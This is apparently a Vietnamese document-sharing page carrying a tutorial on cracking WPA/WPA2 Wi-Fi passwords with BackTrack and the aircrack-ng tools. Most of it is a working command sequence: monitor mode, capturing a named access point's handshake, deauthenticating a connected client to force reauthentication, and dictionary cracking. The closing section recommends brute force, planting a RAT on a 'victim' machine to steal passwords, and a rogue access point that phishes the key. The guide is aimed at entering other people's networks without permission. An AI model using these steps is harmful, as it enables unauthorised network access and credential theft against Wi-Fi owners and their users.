Hướng Dẫn Hack Wifi Mã Hóa Dạng WPA-WPA2
-
Upload
tran-trung-hieu -
Category
Documents
-
view
1.304 -
download
2
Transcript of Hướng Dẫn Hack Wifi Mã Hóa Dạng WPA-WPA2
Hướng Dẫn Hack Wifi Mã Hóa Dạng WPA/WPA2
Tóm tắt các lệnh
1: airodump-ng // để kiểm tra interface của card wireless
2: airmon-ng start wlan0 // khởi động card wireless
3: airodump-ng start mon0 // chuyển sang chế độ nghe ngóng-giám sát.
4: airodump-ng -c 1 –bssid xx:xx:xx:xx:xx:xx -w capture mon0 //bắt gói tin AP xx.. là
mac AP cần tấn công.
5: aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c yy:yy:yy:yy:yy:yy mon0 / làm client rớt mạng
nhanh chóng để lấy được gói tin chứa thông tin xác thực. yy… là MAC của client đang
kết nối đến AP.
6: aircrack-ng -c /root/capture-01.cap -w /mnt/IT/wordlist/keys.txt // so sánh thông tin mã
hóa pass với bộ từ điển để lấy tìm pass, /root/capture-01.cap là file chứa gói xác thực bắt
được, /mnt/IT/wordlist/keys.txt là đường dẫn chỉ đến nơi chứa file dictionary.
1.Bộ từ điển đủ mạnh, hoặc dùng của Back track cũng được. Từ điển thì các bạn có thể
tải trên mạng rất nhiều, nếu có thời gian thì mình sẽ hướng dẫn làm từ điển riêng cho
mình và cái không thể thiếu là hệ điều hành Back Track .
2. 1 cái USB (>=4G)để bung hệ điều hành Back track boot trên USB thay vì dùng máy
ảo, hoặc bạn burn OS ra đĩa DVD cũng được.
3. Nếu dùng USB thì phải cần đến phần mền này unetbootin-windows-575 mục đích là
tạo file boot USB cho OS Linux, nếu không có nó sẽ không boot được bằng USB.
Nếu Boot bằng HHD thì bạn chỉ cần chọn chỗ Type là hard disk,chỉ với dung lượng gần
2g thì ổ cứng của bạn có thể chạy hàng chục HDH này trên một ổ cứng là bình thường.
xong khởi động lại sẽ có menu cho bạn chọn là khởi động vào windown bình thường hay
vào Backtrack
4. Khởi động lại máy boot vào USB
4.Chọn chế độ graphic để dễ khai thác (exploit). tóm tắt các lệnh cần dùng.
1: airodump-ng –> kiểm tra interface của card xem có hỗ trợ hack không. google seach
xem các loại card hỗ trợ(support) không nhé. Để biết card wifi có hỗ trợ không bạn làm
đến bước thứ 3 tiếp theo sau đây.
2: airmon-ng start wlan0 –> khởi động card wireless
3: airodump-ng start mon0 –> chuyển sang chế độ nghe ngóng – giám sát, nếu mà hiện
như hình sau là card có hỗ trợ hack.
4. airodump-ng wlan0 –>xem các thông tin về AP để lấy thông tin khai thác(exploit) cho các
bước sau.
Ở đây chúng ta cần lấy là MAC của AP và Client đang kết nối với nó. AP Chúng ta cần
tấn công là “NguyenTrongTien” dạng mã hóa là WPA2 CCMP/AES là một cơ chế mã
hóa rất mạnh và phức tạp.
4. Mở thêm một shell nữa gõ lệnh : airodump-ng -c 9 –bssid 00:27:19:D5:6D:c4 -w wpa
mon0 –> thực hiện bắt gói tin của AP với kênh ở cột CH là 9 (-c 9) MAC AP
00:27:19:D5:6D:C4 và MAC Client 00:55F:BF:7F:EA . wpa là tên đặt cho gói tin bắt
được bạn muốn đặt tên thế nào cũng được. mục đích của gói tin này là chứa các thông tin
mã hóa của password lấy nó để so sánh với dictionary. sau khi enter bạn thấy như sau:
vẫn còn chữ fixed channel wlan0 (góc phải trên cùng) là chưa bắt được gói tin cần thiết
nếu bắt tay thành công 4 lần thì sẽ có chữ WPA Handshake…. để nó hiệu qua nhanh hơn
chúng ta mở shell mới gõ lệnh tiếp theo (5).
5. Mở thêm một shell mới rồi gõ lệnh nhấn mũ tên đi lên và enter nhiều lần để có hiểu
quả nhanh nhất : aireplay-ng -0 1 -a 00:27:19:D5:6D:c4 -c 00:22:5F:BF:7F:EA mon0 –
>
-0 bắt client xác thực lại vì khi xác thực lại ta sẽ lấy được thông tin mã hóa pass quá trình
này không phải người dùng nhập lại mật khẩu đâu mà bị rớt mạng trong giây lát và máy
sẽ tự động kết nối lại,(trong lúc này mà có client nào kết nối thì cũng thành công trong
việc bắt gói tin xác thực) như vậy ta sẽ lấy đc thông tin. chú ý làm liên tục lệnh này đề có
kết quả nhanh nhất.
1 is the number of deauths to send
Kết quả như đã nói ở bước 4 là như sau , thấy chữ WPA Handshake… nghĩa là bắt tay
thành công 4 lần( ai học mạng không dây sẽ hiểu rõ quá trình này)
Bước tiếp theo là so sánh thông tin bắt được với dic để tìm pass
6 aircrack-ng -w pass.txt wpa-01.cap ” pass.tx” –> đây là file dic mà bạn tải về có dạng *.txt,
wpa-01.cap là gói tin mà bạn bắt ở bước 4. tóm lại dòng lệnh này là để giải mã pass.
chú ý là phải đúng đường dẫn đến file dic nhé, để đỡ phải gõ bạn mở nơi chứa file dic rồi kéo thả
vào màn hình shell sau chữ -w như hình sau :
Hoặc có thể dùng từ điển có sẵn của Back Track với đường dẫn bên dưới gõ mấy chữ đầu rồi
nhấn tab thì bạn đỡ phải gõ cụ thể vì OS Linux hỗ trợ điều này VD: /pent –>nhấn tab thì chúng
ta không phải gõ thêm chữ est/ đằng sau,cứ tương tự như đường dẫn đến file hay thư mục
(wpa*.cap nghĩa là tất cả các file có tên wpa..cap, file này thường có dạng *-01.cap,*-02.cap)
Bây giờ thì ngồi chờ nhé, đây là kết quả.
Sự thành công hay thất bại phụ thuộc vào những yếu tố sau:
1. file dic của bạn đủ mạnh để có thể có được pass.
2. Máy cấu hình càng mạnh thì càng nhanh như hình trên là 352.03 k/s (chậm lắm) bèo cũng phải
trên mb/s thì mới ok.
Tóm lại :Nếu là mã hóa dạng Web thì 100% lấy được pass
1. Dictionary attack chủ yếu là hên xui.
2. Bruteforce attack cách này thì perfect ,pass cỡ nào tra cũng ra bù lại thời gian thì khỏi phải nói
.
3. RAT+Wirelesskeyview combo attack cách này thì tựa như là cài Keylogger vào máy victim,
mà con RAT này lợi hại hơn KeyLog ở chỗ là mình có thể điều khiển máy victim => lấy cắp
pass rất dễ) .
4. Rogue AP attack dễ lấy pass nhất .Nhưng cách này dòi hỏi phải có kiến thức nhiều về mạng,
vì cách thức hoạt động là tạo một AP giả mạo ,sau đó Victim kết nối vào và nó require password
again ,sau khi victim type vào thì pass sẽ chuyển về cho mình.